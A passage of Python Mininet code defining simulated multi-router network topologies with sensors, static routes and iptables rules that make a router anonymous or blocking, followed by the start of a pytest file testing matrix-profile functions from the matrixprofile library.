self.net_hosts.append(self.addHost('h7', ip='192.168.2.3/24', defaultRoute=r1IP3+'/24'))
self.addLink('h7', self.swc[3])
self.alias['h7'] = ['192.168.2.3']
self.net_hosts.append(self.addHost('h8', ip='192.168.2.4/24', defaultRoute=r1IP3 + '/24'))
self.addLink('h8', self.swc[3])
self.alias['h8'] = ['192.168.2.4']
self.sroutes['h8'] = ['ip route add default via 192.168.2.1 dev h8-eth0']
self.sroutes['h7'] = ['ip route add default via 192.168.2.1 dev h7-eth0']
self.sroutes['h9'] = ['ip route add default via 192.168.2.1 dev h9-eth0']
self.fw_rules['r1'] = ['iptables -P FORWARD DROP']
self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth1 -s 12.0.0.0/8 -o r1-eth2 -d 192.168.1.0/24 -j ACCEPT')
self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth2 -s 192.168.1.0/24 -o r1-eth1 -d 12.0.0.0/8 -j ACCEPT')
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
else:
sensor = self.swc[3]
intf = 's3-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
#if i == 1:
# self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
#else:
# self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
def add_firewall_rules(self, net):
'''Add firewall rules'''
for k in self.fw_rules.keys():
for r in self.fw_rules[k]:
net[k].cmd(r)
class NetworkTopo8( Topo ):
"""
This topology simulates a network with three routers.
Two hosts belong to subnet 12.0.0.0/8, representing the internet.
Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
Router1, the one that connects the three subnets, is anonymous.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.3.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.sensor4 = False if (params['sensor4'] is None or params['sensor4'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo8, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
# Connect the DMZ
r1IP2 = '192.168.4.1'
r2IP1 = '192.168.4.2'
r2IP2 = '192.168.1.1'
# TODO l' indirizzo di default del router deve corrispondere sempre al' indirizzo della stessa classe degli host che gli sono attaccati (es: r2IP1 non funziona qui!)
self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
self.alias['r2'] = []
self.alias['r1'].append(r1IP2)
self.alias['r2'].append(r2IP1)
self.alias['r2'].append(r2IP2)
self.sroutes['r2'] = []
self.swc[5] = self.addSwitch('s5')
self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
self.addLink('h3', self.swc[2])
self.alias['h3'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
# Connect LAN 1 and LAN 2
r1IP3 = '192.168.5.1'
r3IP1 = '192.168.5.2'
r3IP2 = '192.168.2.1'
r3IP3 = '192.168.3.1'
self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
self.alias['r3'] = []
self.alias['r1'].append(r1IP3)
self.alias['r3'].append(r3IP1)
self.alias['r3'].append(r3IP2)
self.alias['r3'].append(r3IP3)
self.sroutes['r3'] = []
self.swc[6] = self.addSwitch('s6')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router
self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.swc[3] = self.addSwitch('s3')
self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
self.addLink('h5', self.swc[3])
self.alias['h5'] = ['192.168.2.2']
self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
self.addLink('h6', self.swc[3])
self.alias['h6'] = ['192.168.2.3']
self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
self.swc[4] = self.addSwitch('s4')
self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
self.addLink('h7', self.swc[4])
self.alias['h7'] = ['192.168.3.2']
self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
self.addLink('h8', self.swc[4])
self.alias['h8'] = ['192.168.3.3']
self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
if self.sensor4: self.add_sensor_LAN(3)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
elif i == 2 :
sensor=self.swc[3]
intf = 's3-eth1'
else:
sensor=self.swc[4]
intf = 's4-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
if i == 1:
self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
else:
self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
def add_firewall_rules(self, net):
'''Add firewall rules to make router r1 anonymous'''
net['r1'].cmd('iptables -P OUTPUT DROP')
class NetworkTopo9( Topo ):
"""
This topology simulates a network with three routers.
Two hosts belong to subnet 12.0.0.0/8, representing the internet.
Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
Router1, the one that connects the three subnets, is blocking.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.3.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.sensor4 = False if (params['sensor4'] is None or params['sensor4'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo9, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
# Connect the DMZ
r1IP2 = '192.168.4.1'
r2IP1 = '192.168.4.2'
r2IP2 = '192.168.1.1'
# TODO l' indirizzo di default del router deve corrispondere sempre al' indirizzo della stessa classe degli host che gli sono attaccati (es: r2IP1 non funziona qui!)
self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
self.alias['r2'] = []
self.alias['r1'].append(r1IP2)
self.alias['r2'].append(r2IP1)
self.alias['r2'].append(r2IP2)
self.sroutes['r2'] = []
self.swc[5] = self.addSwitch('s5')
self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
self.addLink('h3', self.swc[2])
self.alias['h3'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
# Connect LAN 1 and LAN 2
r1IP3 = '192.168.5.1'
r3IP1 = '192.168.5.2'
r3IP2 = '192.168.2.1'
r3IP3 = '192.168.3.1'
self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
self.alias['r3'] = []
self.alias['r1'].append(r1IP3)
self.alias['r3'].append(r3IP1)
self.alias['r3'].append(r3IP2)
self.alias['r3'].append(r3IP3)
self.sroutes['r3'] = []
self.swc[6] = self.addSwitch('s6')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router
self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.swc[3] = self.addSwitch('s3')
self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
self.addLink('h5', self.swc[3])
self.alias['h5'] = ['192.168.2.2']
self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
self.addLink('h6', self.swc[3])
self.alias['h6'] = ['192.168.2.3']
self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
self.swc[4] = self.addSwitch('s4')
self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
self.addLink('h7', self.swc[4])
self.alias['h7'] = ['192.168.3.2']
self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
self.addLink('h8', self.swc[4])
self.alias['h8'] = ['192.168.3.3']
self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
if self.sensor4: self.add_sensor_LAN(3)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
elif i == 2 :
sensor=self.swc[3]
intf = 's3-eth1'
else:
sensor=self.swc[4]
intf = 's4-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
if i == 1:
self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
else:
self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
'''Add static routes to the router for subnets not directly visible'''
for k in self.sroutes.keys():
for r in self.sroutes[k]:
net[k].cmd(r)
def create_alias_file(self):
with open('alias', 'w') as f:
for k in self.alias.keys():
f.write(k + ' ')
for ip in self.alias[k]:
f.write(ip + ' ')
f.write('\n')
def add_firewall_rules(self, net):
'''Add firewall rules to make router r1 anonymous'''
net['r1'].cmd('iptables -P FORWARD DROP')
net['r1'].cmd('iptables -P INPUT DROP')
net['r1'].cmd('iptables -P OUTPUT DROP') | 52.839421 | 173 | 0.583644 | 11,777 | 76,670 | 3.767938 | 0.027172 | 0.042321 | 0.039211 | 0.033713 | 0.975617 | 0.971741 | 0.96969 | 0.961442 | 0.959256 | 0.95511 | 0 | 0.09938 | 0.25152 | 76,670 | 1,451 | 174 | 52.839421 | 0.673893 | 0.188327 | 0 | 0.945374 | 0 | 0.051101 | 0.203532 | 0.000684 | 0 | 0 | 0 | 0.002757 | 0 | 1 | 0.05022 | false | 0.021145 | 0.005286 | 0 | 0.064317 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8173b98ebf88a00b38505a3ff2e9bd36cb563a8b | 7,153 | py | Python | tests/test_matrixProfile.py | heyoka/matrixprofile-ts | 2cea36ff3ba1a74e81ba9ab6e6735a095fa7498d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_matrixProfile.py | heyoka/matrixprofile-ts | 2cea36ff3ba1a74e81ba9ab6e6735a095fa7498d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_matrixProfile.py | heyoka/matrixprofile-ts | 2cea36ff3ba1a74e81ba9ab6e6735a095fa7498d | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-06-24T02:57:02.000Z | 2019-06-24T02:57:02.000Z | from matrixprofile.matrixProfile import *
import numpy as np
import pytest
class TestClass(object):
def test_naiveMP_self_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
r = naiveMP(a,4)
assert(r[0] == mp_outcome).all()
def test_naiveMP_self_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
r = naiveMP(a,4)
assert(r[1] == mpi_outcome).all()
def test_naiveMP_dual_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
r = naiveMP(a,4,b)
assert(r[0] == mp_outcome).all()
def test_naiveMP_dual_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([0., 1., 2., 3., 0., 1., 2., 3., 0.])
r = naiveMP(a,4,b)
assert(r[1] == mpi_outcome).all()
def test_stmp_self_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
r = stmp(a,4)
assert(r[0] == mp_outcome).all()
def test_stmp_self_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
r = stmp(a,4)
assert(r[1] == mpi_outcome).all()
def test_stmp_dual_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
r = stmp(a,4,b)
assert(r[0] == mp_outcome).all()
def test_stmp_dual_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([0., 1., 2., 3., 0., 1., 2., 3., 0.])
r = stmp(a,4,b)
assert(r[1] == mpi_outcome).all()
def test_stamp_self_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
r = stamp(a,4, sampling=1.0)
assert(r[0] == mp_outcome).all()
def test_stamp_self_mpi(self):
#Note that we're only testing for the length of the matrix profile index and not the specific values
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
r = stamp(a,4,sampling=1.0)
assert(len(r[1]) == 9)
def test_stamp_dual_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
r = stamp(a,4,b,sampling=1.0)
assert(r[0] == mp_outcome).all()
def test_stamp_dual_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mpi_outcome = np.array([0., 1., 2., 3., 0., 1., 2., 3., 0.])
r = stamp(a,4,b,sampling=1.0)
assert(len(r[1]) == 9)
def test_stampi_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0])
r = stamp(a,4, sampling=1.0)
final = np.round(stampi_update(a,4,r[0],r[1],95),2)
mp_outcome = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.83])
assert(np.allclose(final[0],mp_outcome))
def test_stampi_mpi(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0])
r = stamp(a,4, sampling=1.0)
final = np.round(stampi_update(a,4,r[0],r[1],95),2)
mpi_outcome = np.array([4.0, 5.0, 6.0, 7.0, 0.0, 1.0, 2.0, 3.0, 3.0])
assert(np.allclose(final[1],mpi_outcome))
def test_stomp_self_mp(self):
a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
